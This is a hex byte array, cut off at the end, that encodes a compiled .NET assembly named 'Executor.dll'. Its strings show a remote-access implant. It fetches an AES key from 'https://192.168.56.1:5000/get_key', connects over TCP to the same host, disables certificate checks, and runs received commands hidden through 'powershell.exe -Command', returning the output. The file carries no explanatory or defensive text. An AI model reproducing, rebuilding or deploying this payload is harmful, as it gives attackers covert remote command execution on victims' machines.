0x00,0x18,0x00,0x00,0x01,0x02,0x00,0x00,0x00,0x9e,0x00,0x00,0x00,0xa5,0x00,0x00,0x00,0x43,0x01,0x00,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x96,0x00,0x00,0x00,0xba,0x00,0x00,0x00,0x50,0x01,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x54,0x01,0x00,0x00,0x5b,0x01,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x13,0x30,0x06,0x00,0x71,0x00,0x00,0x00,0x04,0x00,0x00,0x11,0x00,0x73,0x30,0x00,0x00,0x0a,0x25,0x73,0x31,0x00,0x00,0x0a,0x25,0x72,0x81,0x00,0x00,0x70,0x6f,0x32,0x00,0x00,0x0a,0x00,0x25,0x72,0x9f,0x00,0x00,0x70,0x02,0x28,0x33,0x00,0x00,0x0a,0x6f,0x34,0x00,0x00,0x0a,0x00,0x25,0x17,0x6f,0x35,0x00,0x00,0x0a,0x00,0x25,0x16,0x6f,0x36,0x00,0x00,0x0a,0x00,0x25,0x17,0x6f,0x37,0x00,0x00,0x0a,0x00,0x25,0x17,0x6f,0x38,0x00,0x00,0x0a,0x00,0x6f,0x39,0x00,0x00,0x0a,0x00,0x0a,0x06,0x6f,0x3a,0x00,0x00,0x0a,0x26,0x06,0x6f,0x3b,0x00,0x00,0x0a,0x6f,0x17,0x00,0x00,0x0a,0x0b,0x06,0x6f,0x3c,0x00,0x00,0x0a,0x00,0x07,0x0c,0x2b,0x00,0x08,0x2a,0x22,0x02,0x28,0x3d,0x00,0x00,0x0a,0x00,0x2a,0x2e,0x73,0x07,0x00,0x00,0x06,0x80,0x01,0x00,0x00,0x04,0x2a,0x22,0x02,0x28,0x3d,0x00,0x00,0x0a,0x00,0x2a,0x00,0x13,0x30,0x01,0x00,0x07,0x00,0x00,0x00,0x05,0x00,0x00,0x11,0x00,0x17,0x0a,0x2b,0x00,0x06,0x2a,0x00,0x42,0x53,0x4a,0x42,0x01,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x76,0x34,0x2e,0x30,0x2e,0x33,0x30,0x33,0x31,0x39,0x00,0x00,0x00,0x00,0x05,0x00,0x6c,0x00,0x00,0x00,0x08,0x05,0x00,0x00,0x23,0x7e,0x00,0x00,0x74,0x05,0x00,0x00,0xc4,0x06,0x00,0x00,0x23,0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x00,0x00,0x00,0x00,0x38,0x0c,0x00,0x00,0xb4,0x00,0x00,0x00,0x23,0x55,0x53,0x00,0xec,0x0c,0x00,0x00,0x10,0x00,0x00,0x00,0x23,0x47,0x55,0x49,0x44,0x00,0x00,0x00,0xfc,0x0c,0x00,0x00,0x48,0x02,0x00,0x00,0x23,0x42,0x6c,0x6f,0x62,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x01,0x57,0x15,0x02,0x00,0x09,0x0a,0x00,0x00,0x00,0xfa,0x01,0x33,0x00,0x16,0x00,0x00,0x01,0x00,0x00,0x00,0x2e,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x02,0x00,0x00,
0x00,0x08,0x00,0x00,0x00,0x09,0x00,0x00,0x00,0x3d,0x00,0x00,0x00,0x12,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x09,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x54,0x03,0x01,0x00,0x00,0x00,0x00,0x00,0x06,0x00,0x31,0x02,0xdf,0x04,0x06,0x00,0x9c,0x02,0xdf,0x04,0x06,0x00,0x61,0x01,0xc8,0x04,0x0f,0x00,0xff,0x04,0x00,0x00,0x06,0x00,0x9e,0x01,0xdc,0x02,0x06,0x00,0x83,0x02,0xc8,0x03,0x06,0x00,0xfa,0x01,0xc8,0x03,0x06,0x00,0xb7,0x01,0xc8,0x03,0x06,0x00,0xd4,0x01,0xc8,0x03,0x06,0x00,0x51,0x02,0xc8,0x03,0x06,0x00,0x87,0x01,0xc8,0x03,0x06,0x00,0x19,0x02,0xdf,0x04,0x06,0x00,0x6a,0x02,0xdf,0x04,0x06,0x00,0x75,0x01,0xdf,0x04,0x06,0x00,0xae,0x05,0x93,0x03,0x0a,0x00,0xad,0x03,0x93,0x06,0x06,0x00,0x86,0x03,0x4e,0x00,0x0a,0x00,0x6f,0x03,0x93,0x06,0x06,0x00,0x3f,0x04,0x4e,0x00,0x06,0x00,0x13,0x04,0x4e,0x00,0x0a,0x00,0xdb,0x04,0x93,0x06,0x0e,0x00,0xe1,0x05,0x86,0x05,0x0e,0x00,0x61,0x03,0x86,0x05,0x06,0x00,0xda,0x03,0x93,0x03,0x12,0x00,0x7e,0x05,0xc8,0x04,0x06,0x00,0x46,0x01,0xdf,0x04,0x16,0x00,0x08,0x03,0xb0,0x06,0x0a,0x00,0x29,0x01,0x0e,0x05,0x0a,0x00,0xbe,0x03,0x0e,0x05,0x1a,0x00,0x5b,0x05,0xb0,0x06,0x06,0x00,0x8c,0x03,0x4e,0x00,0x0a,0x00,0xc1,0x00,0x93,0x06,0x06,0x00,0x4c,0x04,0x4e,0x00,0x06,0x00,0xf9,0x00,0x93,0x03,0x06,0x00,0x20,0x04,0x4e,0x00,0x1e,0x00,0x2b,0x04,0xb5,0x05,0x22,0x00,0xd7,0x05,0xb5,0x05,0x0a,0x00,0x9a,0x03,0x93,0x06,0x06,0x00,0xd3,0x02,0x47,0x06,0x0a,0x00,0xd2,0x00,0x93,0x06,0x06,0x00,0xce,0x02,0x93,0x03,0x26,0x00,0xee,0x00,0x07,0x04,0x06,0x00,0x16,0x00,0x77,0x00,0x06,0x00,0x57,0x04,0x93,0x03,0x06,0x00,0xf6,0x02,0x93,0x03,0x12,0x00,0xf6,0x03,0xc8,0x04,0x00,0x00,0x00,0x00,0x45,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x10,0x00,0xbf,0x04,0x00,0x00,0x3d,0x00,0x01,0x00,0x01,0x00,0x03,0x21,0x10,0x00,0x73,0x00,0x00,0x00,0x3d,0x00,0x01,0x00,0x06,0x00,0x36,0x00,0x2d,0x00,0x30,0x01,0x16,0x00,0x01,0x00,0x34,0x01,0x50,0x20,0x00,0x00,0x00,0x00,0x91,0x00,0x0b,0x06,0x38,0x01,0x01,0x00,0xbc,0x20,0x00,0x00,0x00,0x00,0x91,0x00,0x03,
0x06,0x40,0x01,0x03,0x00,0x20,0x21,0x00,0x00,0x00,0x00,0x96,0x00,0xe4,0x03,0x48,0x01,0x05,0x00,0xf8,0x22,0x00,0x00,0x00,0x00,0x91,0x00,0xa1,0x00,0x4c,0x01,0x05,0x00,0x75,0x23,0x00,0x00,0x00,0x00,0x86,0x18,0x7e,0x04,0x06,0x00,0x06,0x00,0x7e,0x23,0x00,0x00,0x00,0x00,0x91,0x18,0x84,0x04,0x48,0x01,0x06,0x00,0x8a,0x23,0x00,0x00,0x00,0x00,0x86,0x18,0x7e,0x04,0x06,0x00,0x06,0x00,0x94,0x23,0x00,0x00,0x00,0x00,0x83,0x00,0x0a,0x00,0x51,0x01,0x06,0x00,0x00,0x00,0x01,0x00,0x53,0x06,0x00,0x00,0x02,0x00,0xb5,0x04,0x00,0x00,0x01,0x00,0x5d,0x06,0x00,0x00,0x02,0x00,0x9b,0x04,0x00,0x00,0x01,0x00,0xb0,0x00,0x00,0x00,0x01,0x00,0x31,0x00,0x00,0x00,0x02,0x00,0x36,0x00,0x00,0x00,0x03,0x00,0x3b,0x00,0x00,0x00,0x04,0x00,0x40,0x00,0x09,0x00,0x7e,0x04,0x01,0x00,0x11,0x00,0x7e,0x04,0x06,0x00,0x19,0x00,0x7e,0x04,0x0a,0x00,0x29,0x00,0x7e,0x04,0x10,0x00,0x31,0x00,0x7e,0x04,0x10,0x00,0x39,0x00,0x7e,0x04,0x10,0x00,0x41,0x00,0x7e,0x04,0x10,0x00,0x49,0x00,0x7e,0x04,0x10,0x00,0x51,0x00,0x7e,0x04,0x10,0x00,0x59,0x00,0x7e,0x04,0x10,0x00,0x61,0x00,0x7e,0x04,0x01,0x00,0x69,0x00,0x7e,0x04,0x15,0x00,0x71,0x00,0x7e,0x04,0x15,0x00,0xd1,0x00,0x7e,0x04,0x06,0x00,0x89,0x00,0x7e,0x04,0x06,0x00,0x91,0x00,0x7e,0x04,0x25,0x00,0x99,0x00,0x7e,0x04,0x30,0x00,0x09,0x01,0x40,0x01,0x10,0x00,0x11,0x01,0x21,0x01,0x06,0x00,0x89,0x00,0x7b,0x06,0x36,0x00,0x89,0x00,0x7e,0x04,0x45,0x00,0xa1,0x00,0x7e,0x04,0x30,0x00,0x19,0x01,0x97,0x00,0x4b,0x00,0xa9,0x00,0x39,0x01,0x68,0x00,0xd9,0x00,0x7e,0x04,0x6d,0x00,0x21,0x01,0x2c,0x03,0x73,0x00,0x29,0x01,0x7e,0x04,0x06,0x00,0x29,0x01,0x66,0x00,0x79,0x00,0x31,0x01,0x8b,0x06,0x45,0x00,0x39,0x01,0x24,0x00,0x7f,0x00,0x39,0x01,0x3c,0x05,0x79,0x00,0x31,0x01,0x5f,0x00,0x45,0x00,0x31,0x01,0xb8,0x00,0x85,0x00,0x31,0x01,0x83,0x06,0x36,0x00,0x31,0x01,0x58,0x00,0x36,0x00,0x31,0x01,0xa5,0x04,0x8c,0x00,0x31,0x01,0x8b,0x04,0x8c,0x00,0xb1,0x00,0x7e,0x04,0x95,0x00,0xb1,0x00,0x7c,0x03,0x9b,0x00,0xf9,0x00,0x92,0x00,0xa0,0x00,0x51,0x01,0xe9,0x00,0xa8,0x00,0x51,0x01,0x7b,0x06,0xbf,0x00,0x61,0x01,0x3c,0x05,0xcd,
0x00,0x51,0x01,0xa7,0x05,0xd3,0x00,0xf9,0x00,0x40,0x01,0xec,0x00,0xc1,0x00,0xdd,0x00,0x4b,0x00,0x69,0x01,0xfd,0x02,0xf4,0x00,0xc9,0x00,0x7e,0x04,0x06,0x00,0x71,0x01,0x7e,0x04,0x06,0x00,0x71,0x01,0x05,0x01,0x10,0x00,0x69,0x01,0xa7,0x05,0xff,0x00,0x71,0x01,0x99,0x05,0x10,0x00,0x71,0x01,0x2c,0x06,0x05,0x01,0x71,0x01,0xba,0x02,0x05,0x01,0x71,0x01,0x68,0x06,0x05,0x01,0x71,0x01,0x64,0x04,0x05,0x01,0xc9,0x00,0xe8,0x03,0x0a,0x01,0xc9,0x00,0x13,0x06,0x11,0x01,0xc9,0x00,0x19,0x06,0x15,0x01,0xc9,0x00,0xc0,0x05,0x06,0x00,0x79,0x00,0x7e,0x04,0x06,0x00,0x21,0x00,0x6b,0x00,0x2b,0x02,0x27,0x00,0x5b,0x00,0x3c,0x02,0x2e,0x00,0x0b,0x00,0x5c,0x01,0x2e,0x00,0x13,0x00,0x65,0x01,0x2e,0x00,0x1b,0x00,0x84,0x01,0x2e,0x00,0x23,0x00,0x8d,0x01,0x2e,0x00,0x2b,0x00,0xcb,0x01,0x2e,0x00,0x33,0x00,0xd9,0x01,0x2e,0x00,0x3b,0x00,0xe4,0x01,0x2e,0x00,0x43,0x00,0xf1,0x01,0x2e,0x00,0x4b,0x00,0xcb,0x01,0x2e,0x00,0x53,0x00,0xcb,0x01,0x41,0x00,0x6b,0x00,0x2b,0x02,0x43,0x00,0x63,0x00,0x31,0x02,0x43,0x00,0x6b,0x00,0x2b,0x02,0x63,0x00,0x73,0x00,0x37,0x02,0xc4,0x00,0x6b,0x00,0x31,0x02,0x00,0x01,0x63,0x00,0x25,0x02,0x1a,0x00,0x3b,0x00,0x4f,0x00,0xf8,0x00,0x1a,0x01,0x04,0x80,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xbf,0x04,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x12,0x01,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x93,0x06,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x86,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x6b,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0xb0,0x06,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x45,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x27,0x01,0xeb,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x27,0x01,0xcc,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x07,0x04,0x00,0x00,0x00,0x00,0x03,0x00,0x02,0x00,0x53,0x00,0xbb,0x00,0x55,0x00,0xbb,0x00,0x59,0x00,0xbb,0x00,0x00,0x00,0x00,0x00,0x00,0x3c,0x3e,0x39,0x5f,0x5f,0x32,0x5f,0x30,0x00,0x3c,0x52,0x75,0x6e,0x3e,0x62,0x5f,0x5f,0x32,0x5f,0x30,0x00,0x49,0x45,0x6e,0x75,0x6d,0x65,0x72,0x61,0x62,0x6c,0x65,0x60,0x31,0x00,0x67,0x65,0x74,0x5f,0x55,0x54,0x46,0x38,0x00,0x3c,0x3e,0x39,0x00,0x3c,0x70,0x30,0x3e,0x00,0x3c,0x70,0x31,0x3e,0x00,0x3c,0x70,0x32,0x3e,0x00,0x3c,0x70,0x33,0x3e,0x00,0x3c,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x3e,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x49,0x4f,0x00,0x67,0x65,0x74,0x5f,0x49,0x56,0x00,0x73,0x65,0x74,0x5f,0x49,0x56,0x00,0x44,0x6f,0x77,0x6e,0x6c,0x6f,0x61,0x64,0x44,0x61,0x74,0x61,0x00,0x3c,0x3e,0x63,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x47,0x65,0x6e,0x65,0x72,0x69,0x63,0x00,0x52,0x65,0x61,0x64,0x00,0x52,0x65,0x61,0x64,0x54,0x6f,0x45,0x6e,0x64,0x00,0x45,0x78,0x65,0x63,0x75,0x74,0x65,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x00,0x63,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x00,0x73,0x65,0x74,0x5f,0x4d,0x6f,0x64,0x65,0x00,0x43,0x72,0x79,0x70,0x74,0x6f,0x53,0x74,0x72,0x65,0x61,0x6d,0x4d,0x6f,0x64,0x65,0x00,0x43,0x69,0x70,0x68,0x65,0x72,0x4d,0x6f,0x64,0x65,0x00,0x67,0x65,0x74,0x5f,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0x54,0x61,0x6b,0x65,0x00,0x45,0x6e,0x75,0x6d,0x65,0x72,0x61,0x62,0x6c,0x65,0x00,0x49,0x44,0x69,0x73,0x70,0x6f,0x73,0x61,0x62,0x6c,0x65,0x00,0x73,0x65,0x74,0x5f,0x46,0x69,0x6c,0x65,0x4e,0x61,0x6d,0x65,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x00,0x44,0x69,0x73,0x70,0x6f,0x73,0x65,0x00,0x58,0x35,0x30,0x39,0x43,0x65,0x72,0x74,0x69,0x66,0x69,0x63,0x61,0x74,0x65,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x00,0x57,0x72,0x69,0x74,0x65,0x00,0x43,0x6f,0x6d,0x70,0x69,0x6c,0x65,0x72,0x47,0x65,0x6e,0x65,0x72,0x61,0x74,0x65,0x64,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,
0x65,0x00,0x44,0x65,0x62,0x75,0x67,0x67,0x61,0x62,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x4e,0x75,0x6c,0x6c,0x61,0x62,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x54,0x69,0x74,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x54,0x61,0x72,0x67,0x65,0x74,0x46,0x72,0x61,0x6d,0x65,0x77,0x6f,0x72,0x6b,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x46,0x69,0x6c,0x65,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,0x61,0x6c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x43,0x6f,0x6e,0x66,0x69,0x67,0x75,0x72,0x61,0x74,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x52,0x65,0x66,0x53,0x61,0x66,0x65,0x74,0x79,0x52,0x75,0x6c,0x65,0x73,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x43,0x6f,0x6d,0x70,0x69,0x6c,0x61,0x74,0x69,0x6f,0x6e,0x52,0x65,0x6c,0x61,0x78,0x61,0x74,0x69,0x6f,0x6e,0x73,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x50,0x72,0x6f,0x64,0x75,0x63,0x74,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x4e,0x75,0x6c,0x6c,0x61,0x62,0x6c,0x65,0x43,0x6f,0x6e,0x74,0x65,0x78,0x74,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x43,0x6f,0x6d,0x70,0x61,0x6e,0x79,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x43,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x69,0x6c,0x69,0x74,0x79,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x73,0x65,0x74,0x5f,0x55,0x73,0x65,0x53,0x68,0x65,0x6c,0x6c,0x45,0x78,0x65,0x63,0x75,0x74,0x65,0x00,0x42,0x79,0x74,0x65,0x00,0x45,0x6e,0x63,0x6f,0x64,0x69,0x6e,0x67,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x2e,0x56,0x65,0x72,0x73,
0x69,0x6f,0x6e,0x69,0x6e,0x67,0x00,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x67,0x65,0x74,0x5f,0x4c,0x65,0x6e,0x67,0x74,0x68,0x00,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x65,0x72,0x74,0x69,0x66,0x69,0x63,0x61,0x74,0x65,0x56,0x61,0x6c,0x69,0x64,0x61,0x74,0x69,0x6f,0x6e,0x43,0x61,0x6c,0x6c,0x62,0x61,0x63,0x6b,0x00,0x73,0x65,0x74,0x5f,0x53,0x65,0x72,0x76,0x65,0x72,0x43,0x65,0x72,0x74,0x69,0x66,0x69,0x63,0x61,0x74,0x65,0x56,0x61,0x6c,0x69,0x64,0x61,0x74,0x69,0x6f,0x6e,0x43,0x61,0x6c,0x6c,0x62,0x61,0x63,0x6b,0x00,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x2e,0x64,0x6c,0x6c,0x00,0x4e,0x65,0x74,0x77,0x6f,0x72,0x6b,0x53,0x74,0x72,0x65,0x61,0x6d,0x00,0x43,0x72,0x79,0x70,0x74,0x6f,0x53,0x74,0x72,0x65,0x61,0x6d,0x00,0x47,0x65,0x74,0x53,0x74,0x72,0x65,0x61,0x6d,0x00,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x53,0x74,0x72,0x65,0x61,0x6d,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x53,0x79,0x6d,0x6d,0x65,0x74,0x72,0x69,0x63,0x41,0x6c,0x67,0x6f,0x72,0x69,0x74,0x68,0x6d,0x00,0x49,0x43,0x72,0x79,0x70,0x74,0x6f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x00,0x58,0x35,0x30,0x39,0x43,0x68,0x61,0x69,0x6e,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x00,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x00,0x52,0x75,0x6e,0x00,0x73,0x65,0x74,0x5f,0x53,0x74,0x61,0x72,0x74,0x49,0x6e,0x66,0x6f,0x00,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x53,0x74,0x61,0x72,0x74,0x49,0x6e,0x66,0x6f,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4c,0x69,0x6e,0x71,0x00,0x53,0x74,0x72,0x65,0x61,0x6d,0x52,0x65,0x61,0x64,0x65,0x72,0x00,0x54,0x65,0x78,0x74,0x52,0x65,0x61,0x64,0x65,0x72,0x00,0x53,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x6f,0x69,0x6e,0x74,0x4d,0x61,0x6e,0x61,0x67,0x65,0x72,0x00,0x53,0x74,0x72,0x65,0x61,0x6d,0x57,0x72,0x69,0x74,0x65,0x72,0x00,0x54,0x65,0x78,0x74,0x57,0x72,0x69,0x74,0x65,0x72,0x00,0x42,0x69,0x74,0x43,0x6f,0x6e,0x76,0x65,0x72,0x74,0x65,0x72,0x00,0x73,0x65,0x74,0x5f,0x52,0x65,0x64,0x69,0x72,0x65,0x63,0x74,0x53,0x74,0x61,0x6e,0x64,0x61,0x72,0x64,0x45,0x72,0x72,0x6f,0x72,0x00,0x2e,
0x63,0x74,0x6f,0x72,0x00,0x2e,0x63,0x63,0x74,0x6f,0x72,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x44,0x65,0x63,0x72,0x79,0x70,0x74,0x6f,0x72,0x00,0x64,0x65,0x63,0x72,0x79,0x70,0x74,0x6f,0x72,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x45,0x6e,0x63,0x72,0x79,0x70,0x74,0x6f,0x72,0x00,0x65,0x6e,0x63,0x72,0x79,0x70,0x74,0x6f,0x72,0x00,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x44,0x69,0x61,0x67,0x6e,0x6f,0x73,0x74,0x69,0x63,0x73,0x00,0x41,0x65,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x2e,0x43,0x6f,0x6d,0x70,0x69,0x6c,0x65,0x72,0x53,0x65,0x72,0x76,0x69,0x63,0x65,0x73,0x00,0x44,0x65,0x62,0x75,0x67,0x67,0x69,0x6e,0x67,0x4d,0x6f,0x64,0x65,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x53,0x65,0x63,0x75,0x72,0x69,0x74,0x79,0x2e,0x43,0x72,0x79,0x70,0x74,0x6f,0x67,0x72,0x61,0x70,0x68,0x79,0x2e,0x58,0x35,0x30,0x39,0x43,0x65,0x72,0x74,0x69,0x66,0x69,0x63,0x61,0x74,0x65,0x73,0x00,0x47,0x65,0x74,0x42,0x79,0x74,0x65,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x50,0x72,0x69,0x6d,0x69,0x74,0x69,0x76,0x65,0x73,0x00,0x53,0x73,0x6c,0x50,0x6f,0x6c,0x69,0x63,0x79,0x45,0x72,0x72,0x6f,0x72,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x44,0x69,0x61,0x67,0x6e,0x6f,0x73,0x74,0x69,0x63,0x73,0x2e,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x53,0x6f,0x63,0x6b,0x65,0x74,0x73,0x00,0x73,0x65,0x74,0x5f,0x41,0x72,0x67,0x75,0x6d,0x65,0x6e,0x74,0x73,0x00,0x43,0x6f,0x6e,0x63,0x61,0x74,0x00,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x00,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x45,0x78,0x69,0x74,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x57,0x65,0x62,0x43,0x6c,0x69,0x65,0x6e,0x74,0x00,0x54,0x63,0x70,0x43,0x6c,0x69,0x65,0x6e,0x74,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x53,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x6f,0x69,0x6e,0x74,0x00,0x44,0x65,0x63,0x72,0x79,0x70,0x74,0x00,0x45,0x6e,0x63,0x72,
0x79,0x70,0x74,0x00,0x53,0x74,0x61,0x72,0x74,0x00,0x67,0x65,0x74,0x5f,0x53,0x74,0x61,0x6e,0x64,0x61,0x72,0x64,0x4f,0x75,0x74,0x70,0x75,0x74,0x00,0x73,0x65,0x74,0x5f,0x52,0x65,0x64,0x69,0x72,0x65,0x63,0x74,0x53,0x74,0x61,0x6e,0x64,0x61,0x72,0x64,0x4f,0x75,0x74,0x70,0x75,0x74,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x54,0x65,0x78,0x74,0x00,0x70,0x6c,0x61,0x69,0x6e,0x74,0x65,0x78,0x74,0x00,0x63,0x69,0x70,0x68,0x65,0x72,0x74,0x65,0x78,0x74,0x00,0x73,0x65,0x74,0x5f,0x43,0x72,0x65,0x61,0x74,0x65,0x4e,0x6f,0x57,0x69,0x6e,0x64,0x6f,0x77,0x00,0x54,0x6f,0x41,0x72,0x72,0x61,0x79,0x00,0x67,0x65,0x74,0x5f,0x4b,0x65,0x79,0x00,0x73,0x65,0x74,0x5f,0x4b,0x65,0x79,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x53,0x65,0x63,0x75,0x72,0x69,0x74,0x79,0x2e,0x43,0x72,0x79,0x70,0x74,0x6f,0x67,0x72,0x61,0x70,0x68,0x79,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x53,0x65,0x63,0x75,0x72,0x69,0x74,0x79,0x00,0x00,0x43,0x68,0x00,0x74,0x00,0x74,0x00,0x70,0x00,0x73,0x00,0x3a,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x39,0x00,0x32,0x00,0x2e,0x00,0x31,0x00,0x36,0x00,0x38,0x00,0x2e,0x00,0x35,0x00,0x36,0x00,0x2e,0x00,0x31,0x00,0x3a,0x00,0x35,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2f,0x00,0x67,0x00,0x65,0x00,0x74,0x00,0x5f,0x00,0x6b,0x00,0x65,0x00,0x79,0x00,0x00,0x21,0x5a,0x00,0x36,0x00,0x4c,0x00,0x68,0x00,0x46,0x00,0x44,0x00,0x69,0x00,0x43,0x00,0x67,0x00,0x66,0x00,0x4f,0x00,0x42,0x00,0x38,0x00,0x48,0x00,0x4e,0x00,0x4b,0x00,0x00,0x19,0x31,0x00,0x39,0x00,0x32,0x00,0x2e,0x00,0x31,0x00,0x36,0x00,0x38,0x00,0x2e,0x00,0x35,0x00,0x36,0x00,0x2e,0x00,0x31,0x00,0x00,0x1d,0x70,0x00,0x6f,0x00,0x77,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x13,0x2d,0x00,0x43,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,0x64,0x00,0x20,0x00,0x01,0x00,0xf7,0x24,0x5a,0x59,0xd3,0xb7,0x67,0x47,0xa2,0x92,0x2f,0xe7,0x06,0xc9,0xca,0x84,0x00,0x04,0x20,0x01,0x01,0x0